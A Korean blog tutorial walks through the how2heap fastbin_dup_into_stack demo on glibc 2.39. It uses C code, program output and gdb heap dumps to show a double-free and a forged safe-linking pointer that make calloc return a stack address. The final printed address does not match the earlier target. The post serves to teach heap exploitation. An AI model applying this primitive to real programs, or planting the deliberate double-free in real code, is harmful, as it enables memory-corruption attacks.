{"id":3569,"date":"2025-05-11T22:50:04","date_gmt":"2025-05-11T13:50:04","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3569"},"modified":"2025-05-11T22:57:27","modified_gmt":"2025-05-11T13:57:27","slug":"how2heap-glibc2-39-fastbin_dup_into_stack","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3569","title":{"rendered":"[how2heap\/glibc2.39] fastbin_dup_into_stack"},"content":{"rendered":"\n

\ud658\uacbd<\/h3>\n\n\n\n

Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64<\/p>\n\n\n\n

\uc694\uc57d<\/h3>\n\n\n\n

fastbin_dup \uae30\ubc95\uc744 \uc751\uc6a9\ud558\uc5ec \ud799 \ud560\ub2f9\ud560\ub54c \uc2a4\ud0dd\uc601\uc5ed\uc758 \uc8fc\uc18c\ub85c \ubc1b\uac8c \ub9cc\ub4e4 \uc218 \uc788\uc74c.<\/strong><\/p>\n\n\n\n

    \n
  1. fastbin \ubc94\uc704\ub85c \ud560\ub2f9\ubc1b\uae30\uc704\ud574 \ucc98\uc74c\uc5d0 tcache\ub97c \uc804\ubd80 \ucc44\uc6c0.
    7\ubc88 malloc\ud558\uace0, 7\ubc88 free\ud568. (\uc5ec\uae30\uc11c\ub294 malloc(8)<\/code> \uc0ac\uc6a9)<\/li>\n\n\n\n
  2. \uac01\uac01 fastbin\ubc94\uc704\uc778 malloc(8)<\/code> 3\ubc88 \uc218\ud589\ud558\uc5ec a, b, c \uccad\ud06c \ucc28\ub840\ub85c \uc0dd\uc131.<\/li>\n\n\n\n
  3. free(a)<\/code><\/li>\n\n\n\n
  4. free(b)<\/code><\/li>\n\n\n\n
  5. free(a)<\/code><\/li>\n\n\n\n
  6. malloc(8)<\/code> 2\ubc88 \ucd94\uac00 \uc218\ud589 \u2192 \uac01\uac01 1st_alloc(d \uccad\ud06c)<\/strong>, 2nd_alloc<\/strong>\uc73c\ub85c \uba85\uba85\ud558\uaca0\uc74c.<\/li>\n\n\n\n
  7. stack_var[4]\uc5d0\uc11c stack_var[1] = 0x20\uc73c\ub85c fake free size \uc9c0\uc815.
    \uadf8\ub7ec\uba74, calloc<\/code>\uc2dc \ud574\ub2f9 \uc704\uce58\uc5d0 free \uccad\ud06c\uac00 \uc788\ub2e4\uace0 \uc0dd\uac01\ud558\uace0 \uadf8 \ud3ec\uc778\ud130\ub97c \ubc18\ud658\ud558\uac8c \ub428.<\/li>\n\n\n\n
  8. 1st_alloc(d \uccad\ud06c)<\/strong>\uc5d0 \uc2a4\ud0dd\uc8fc\uc18c\ub85c safe-linking\uc774 \uc801\uc6a9\ub41c fd \uac12\uc744 \uc784\uc758\ub85c \ub9cc\ub4e4\uc5b4 \ub123\uc74c.
    \ucd94\ud6c4 free list\uc5d0 \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uae30\uc704\ud568.<\/li>\n\n\n\n
  9. 3rd_alloc<\/strong> calloc(1, 8)<\/code> \ud638\ucd9c\ud558\uba74, \uc774\uc81c \uc2a4\ud0dd \uc8fc\uc18c\ub97c free \ub9ac\uc2a4\ud2b8\uc5d0 \ub123\uac8c \ub428.<\/li>\n\n\n\n
  10. 4th_alloc<\/strong> calloc(1, 8)<\/code> \ud638\ucd9c\ud558\uba74, \uc774\uc81c \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uc74c.<\/li>\n<\/ol>\n\n\n\n

    \ub0b4\uc6a9<\/h3>\n\n\n\n

    fastbin_dup<\/code> \uae30\ubc95\uc744 \ud655\uc7a5\ud55c \uac83\uc73c\ub85c,
    calloc<\/code>\uc744 \uc18d\uc5ec \uc81c\uc5b4 \uac00\ub2a5\ud55c \uc704\uce58(\uc774 \uacbd\uc6b0\uc5d0\ub294 \uc2a4\ud0dd)\ub85c \ud3ec\uc778\ud130\ub97c \ubc18\ud658\ud558\ub3c4\ub85d \ub9cc\ub4ed\ub2c8\ub2e4.<\/p>\n\n\n\n

    1.<\/h3>\n\n\n\n

    tcache\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 7\ubc88 malloc\ud558\uace0, 7\ubc88 free\ub97c \ud574\uc900\ub2e4.
    \uadf8\ub798\uc57c \uc774\ud6c4\ubd80\ud130 fastbin\uc73c\ub85c \ud560\ub2f9 \uac00\ub2a5.<\/p>\n\n\n\n

    \ucf54\ub4dc:<\/p>\n\n\n\n

    fprintf(stderr, \"This file extends on fastbin_dup.c by tricking calloc into\\n\"\n               \"returning a pointer to a controlled location (in this case, the stack).\\n\");\n\n\n        fprintf(stderr,\"Fill up tcache first.\\n\");\n\n        void *ptrs[7];\n\n        for (int i=0; i<7; i++) {\n                ptrs[i] = malloc(8);\n        }\n        for (int i=0; i<7; i++) {\n                free(ptrs[i]);\n        }<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    This file extends on fastbin_dup.c by tricking calloc into\nreturning a pointer to a controlled location (in this case, the stack).\nFill up tcache first.<\/pre>\n\n\n\n
    gdb-peda$ parseheap\nhaddr                prev                size                 status              fd                bk\n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555559370 (size : 0x20c90)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n
    2.<\/h3>\n\n\n\n
    8\ud06c\uae30\ub9cc\ud07c 3\ubc88 \ud560\ub2f9\ud568.
    \uac01\uac01 a, b, c\uccad\ud06c\ub85c\uc368 \ubaa8\ub450 fastbin\uc5d0 \ud574\ub2f9\ub428.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
    unsigned long stack_var[4] __attribute__ ((aligned (0x10)));\n\n\tfprintf(stderr, \"The address we want calloc() to return is %p.\\n\", stack_var + 2);\n\n\tfprintf(stderr, \"Allocating 3 buffers.\\n\");\n\tint *a = calloc(1,8);\n\tint *b = calloc(1,8);\n\tint *c = calloc(1,8);\n\n\tfprintf(stderr, \"1st calloc(1,8): %p\\n\", a);\n\tfprintf(stderr, \"2nd calloc(1,8): %p\\n\", b);\n\tfprintf(stderr, \"3rd calloc(1,8): %p\\n\", c);<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    The address we want calloc() to return is 0x7fffffffe140.\nAllocating 3 buffers.\n1st calloc(1,8): 0x555555559380\n2nd calloc(1,8): 0x5555555593a0\n3rd calloc(1,8): 0x5555555593c0<\/pre>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    3.<\/h3>\n\n\n\n
    a \uccad\ud06c \ud560\ub2f9\uc744 \ud574\uc81c\ud568.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
    fprintf(stderr, \"Freeing the first one...\\n\"); \/\/First call to free will add a reference to the fastbin\n        free(a);<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    Freeing the first one...<\/pre>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Freed        0x555555559              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559370 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    4.<\/h3>\n\n\n\n
    \ub9cc\uc57d \ud55c\ubc88\ub354 a \uccad\ud06c \ucd94\uc18c\uc778 0x555555559380\uc744 free\ud558\uac8c \ub418\uba74
    free list\uc758 top\uc5d0 \ud574\ub2f9\ub418\uae30 \ub54c\ubb38\uc5d0 \ucda9\ub3cc \ubc1c\uc0dd\ud568.<\/p>\n\n\n\n
    \ub530\ub77c\uc11c 2\ubc88\uc9f8\ub85c \ud560\ub2f9\ub41c b \uccad\ud06c \uc8fc\uc18c\uc778 0x5555555593a0\uc744 free\ud568.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
    fprintf(stderr, \"If we free %p again, things will crash because %p is at the top of the free list.\\n\", a, a);\n\n        fprintf(stderr, \"So, instead, we'll free %p.\\n\", b);\n        free(b);<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    If we free 0x555555559380 again, things will crash because 0x555555559380 is at the top of the free list.\nSo, instead, we'll free 0x5555555593a0.<\/pre>\n\n\n\n
    gdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559390 --> 0x555555559370 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0\ngdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Freed        0x555555559              None\n0x555555559390      0x0                 0x20                 Freed     0x55500000c629              None\n0x5555555593b0      0x0                 0x20                 Used                None              None<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    5.<\/h3>\n\n\n\n
    free list\uc758 head\uac00 \uc544\ub2c8\uae30 \ub54c\ubb38\uc5d0, \uc774\uc81c a \uccad\ud06c\ub97c \ud55c\ubc88\ub354 free \ud560 \uc218 \uc788\uc5b4 \ud574\ubcf8\ub2e4.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
            \/\/Calling free(a) twice renders the program vulnerable to Double Free\n        \/\/free(a)\ub97c \ub450 \ubc88 \ud638\ucd9c\ud558\uba74 \ud504\ub85c\uadf8\ub7a8\uc740 Double Free \ucde8\uc57d\uc810\uc5d0 \ub178\ucd9c\ub429\ub2c8\ub2e4.\n\n        fprintf(stderr, \"Now, we can free %p again, since it's not the head of the free list.\\n\", a);\n        free(a);<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    Now, we can free 0x555555559380 again, since it's not the head of the free list.<\/pre>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Freed     0x55500000c6c9              None\n0x555555559390      0x0                 0x20                 Freed     0x55500000c629              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559370 --> 0x555555559390 --> 0x555555559370 (overlap chunk with 0x555555559370(freed) )\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    6.<\/h3>\n\n\n\n
    \uc774\uc81c free \ub9ac\uc2a4\ud2b8\uc5d0\ub294 [ 0x555555559380, 0x5555555593a0, 0x555555559380<\/strong> ]\uac00 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n
    \uc6b0\ub9ac\ub294 \uc774\uc81c 0x555555559380<\/strong> \uc704\uce58\uc758 \ub370\uc774\ud130\ub97c \uc218\uc815\ud558\uc5ec \uacf5\uaca9\uc744 \uc218\ud589\ud560 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n
    \uccab \ubc88\uc9f8 calloc(1, 8)<\/code> \ud638\ucd9c: 0x555555559380<\/strong><\/p>\n\n\n\n
    \ub450 \ubc88\uc9f8 calloc(1, 8)<\/code> \ud638\ucd9c: 0x5555555593a0<\/strong><\/p>\n\n\n\n
    \uc774\uc81c free \ub9ac\uc2a4\ud2b8\uc5d0\ub294 [ 0x555555559380<\/strong> ]\ub9cc \ub0a8\uc544 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
    fprintf(stderr, \"Now the free list has [ %p, %p, %p ]. \"\n                \"We'll now carry out our attack by modifying data at %p.\\n\", a, b, a, a);\n        unsigned long *d = calloc(1,8);\n\n        fprintf(stderr, \"1st calloc(1,8): %p\\n\", d);\n        fprintf(stderr, \"2nd calloc(1,8): %p\\n\", calloc(1,8));\n        fprintf(stderr, \"Now the free list has [ %p ].\\n\", a);<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    Now the free list has [ 0x555555559380, 0x5555555593a0, 0x555555559380 ]. We'll now carry out our attack by modifying data at 0x555555559380.\n1st calloc(1,8): 0x555555559380\n2nd calloc(1,8): 0x5555555593a0\nNow the free list has [ 0x555555559380 ].<\/pre>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Freed                0x0              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559370 --> 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    7.<\/h3>\n\n\n\n
    \uc774\uc81c \uc6b0\ub9ac\ub294 0x555555559380<\/strong>\uc5d0 \uc811\uadfc\ud560 \uc218 \uc788\uc73c\uba70, \uc774 \uc8fc\uc18c\ub294 \uc5ec\uc804\ud788 free \ub9ac\uc2a4\ud2b8\uc758 \ub9e8 \uc55e\uc5d0 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n
    \ub530\ub77c\uc11c \uc6b0\ub9ac\ub294 \uc774\uc81c \uc2a4\ud0dd\uc5d0 \uac00\uc9dc free \ud06c\uae30(\uc774 \uacbd\uc6b0 0x20)\ub97c \uc791\uc131\ud558\uace0 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n
    \uc774\ub807\uac8c \ud558\uba74 calloc<\/code>\uc740 \ud574\ub2f9 \uc704\uce58\uc5d0 free \uccad\ud06c\uac00 \uc788\ub2e4\uace0 \uc0dd\uac01\ud558\uace0 \uadf8 \ud3ec\uc778\ud130\ub97c \ubc18\ud658\ud558\ub294 \ub370 \ub3d9\uc758\ud558\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n
    \uc774\uc81c \uc6b0\ub9ac\ub294 0x555555559380<\/strong>\uc5d0 \uc788\ub294 \ub370\uc774\ud130\uc758 \ucc98\uc74c 8\ubc14\uc774\ud2b8\ub97c \ub36e\uc5b4\uc368\uc11c 0x20 \ubc14\ub85c \uc55e\uc744 \uac00\ub9ac\ud0a4\ub3c4\ub85d \ud569\ub2c8\ub2e4.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
    fprintf(stderr, \"Now, we have access to %p while it remains at the head of the free list.\\n\"\n                \"so now we are writing a fake free size (in this case, 0x20) to the stack,\\n\"\n                \"so that calloc will think there is a free chunk there and agree to\\n\"\n                \"return a pointer to it.\\n\", a);\n        stack_var[1] = 0x20;<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    Now, we have access to 0x555555559380 while it remains at the head of the free list.\nso now we are writing a fake free size (in this case, 0x20) to the stack,\nso that calloc will think there is a free chunk there and agree to\nreturn a pointer to it.\nNow, we overwrite the first 8 bytes of the data at 0x555555559380 to point right before the 0x20.<\/pre>\n\n\n\n
    gdb-peda$ x\/gx $rsp+0x18\n0x7fffffffe138: 0x0000000000000020\n\ngdb-peda$ x\/4gx $rsp+0x10\n0x7fffffffe130: 0x000000000000c000      0x0000000000000020\n0x7fffffffe140: 0x0000000001a00000      0x0000000000200000<\/pre>\n\n\n\n
    8.<\/h3>\n\n\n\n
    addr = 0x555555559380<\/code> (\ud560\ub2f9\ub418\uc5c8\ub358 d \uccad\ud06c)<\/strong>
    ptr = 0x7fffffffe130<\/code> (0x20 \uc4f0\uc600\ub358 stack_var[1] \uc8fc\uc18c)<\/strong><\/p>\n\n\n\n
    enc_fd = (fd) ^ (heapbase >> 12) <\/code>
    = 0x7fffffffe130 ^ (0x555555559380 >> 12) <\/code>
    = 0x7ffaaaaab469<\/code><\/strong><\/p>\n\n\n\n
    \ucd94\ud6c4 free list\uc5d0 \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uae30\uc704\ud574 
    d \uccad\ud06c\uc5d0 \uc2a4\ud0dd\uc8fc\uc18c\ub85c safe-linking\uc774 \uc801\uc6a9\ub41c fd \uac12\uc744 \uc784\uc758\ub85c \ub9cc\ub4e4\uc5b4 \ub123\uc74c.<\/p>\n\n\n\n
    \uc800\uc7a5\ub41c \uac12\uc740 \ud3ec\uc778\ud130\uac00 \uc544\ub2c8\ub77c, 
    safe linking \uba54\ucee4\ub2c8\uc998 \ub54c\ubb38\uc5d0 poisoned value\ub77c\ub294 \uc810\uc5d0 \uc8fc\ubaa9\ud558\uc138\uc694.<\/p>\n\n\n\n
    ^ \ucc38\uace0:<\/p>\n\n\n\n
    https:\/\/research.checkpoint.com\/2020\/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive<\/a><\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
    fprintf(stderr, \"Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\\n\", a);\n        fprintf(stderr, \"Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\\n\");\n        fprintf(stderr, \"^ Reference: https:\/\/research.checkpoint.com\/2020\/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive\/\\n\");\n        unsigned long ptr = (unsigned long)stack_var;\n        unsigned long addr = (unsigned long) d;\n        \/*VULNERABILITY*\/\n        *d = (addr >> 12) ^ ptr;\n        \/*VULNERABILITY*\/<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n^ Reference: https:\/\/research.checkpoint.com\/2020\/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive\/<\/pre>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Freed     0x7ffaaaaab469              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x555555559370 --> 0x7fffffffe130 --> 0x7fe5ffffe (invaild memory)\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    9.<\/h3>\n\n\n\n
    \uc138 \ubc88\uc9f8 calloc(1, 8)<\/code> \ud638\ucd9c: 0x555555559380, 
    \uc2a4\ud0dd \uc8fc\uc18c\ub97c free \ub9ac\uc2a4\ud2b8\uc5d0 \ub123\uc74c. \uc774\uc81c 4\ubc88\uca30 \ud638\ucd9c\uc5d0\uc120 \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uc744\uac83\uc784.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
    fprintf(stderr, \"3rd calloc(1,8): %p, putting the stack address on the free list\\n\", calloc(1,8));<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    3rd calloc(1,8): 0x555555559380, putting the stack address on the free list<\/pre>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x20                 Freed        0x555555559              None\n0x5555555592b0      0x0                 0x20                 Freed     0x55500000c7f9              None\n0x5555555592d0      0x0                 0x20                 Freed     0x55500000c799              None\n0x5555555592f0      0x0                 0x20                 Freed     0x55500000c7b9              None\n0x555555559310      0x0                 0x20                 Freed     0x55500000c659              None\n0x555555559330      0x0                 0x20                 Freed     0x55500000c679              None\n0x555555559350      0x0                 0x20                 Freed     0x55500000c619              None\n0x555555559370      0x0                 0x20                 Used                None              None\n0x555555559390      0x0                 0x20                 Used                None              None\n0x5555555593b0      0x0                 0x20                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x7fffffffe130 --> 0x7fe5ffffe (invaild memory)\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555593d0 (size : 0x20c30)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x0\n(0x20)   tcache_entry[0](7): 0x555555559360 --> 0x555555559340 --> 0x555555559320 --> 0x555555559300 --> 0x5555555592e0 --> 0x5555555592c0 --> 0x5555555592a0<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    10.<\/h3>\n\n\n\n
    4\ubc88\uc9f8\ub85c calloc \ud560\ub2f9\uc744 \ub610 \ud558\uac8c\ub418\uba74, 
    \uc774\uc81c \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uc744 \uc218 \uc788\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n
    \ucf54\ub4dc:<\/p>\n\n\n\n
            void *p = calloc(1,8);\n\n        fprintf(stderr, \"4th calloc(1,8): %p\\n\", p);\n        assert((unsigned long)p == (unsigned long)stack_var + 0x10);<\/pre>\n\n\n\n
    \uacb0\uacfc:<\/p>\n\n\n\n
    4th calloc(1,8): 0x7fffffffe1a0<\/pre>\n\n\n\n
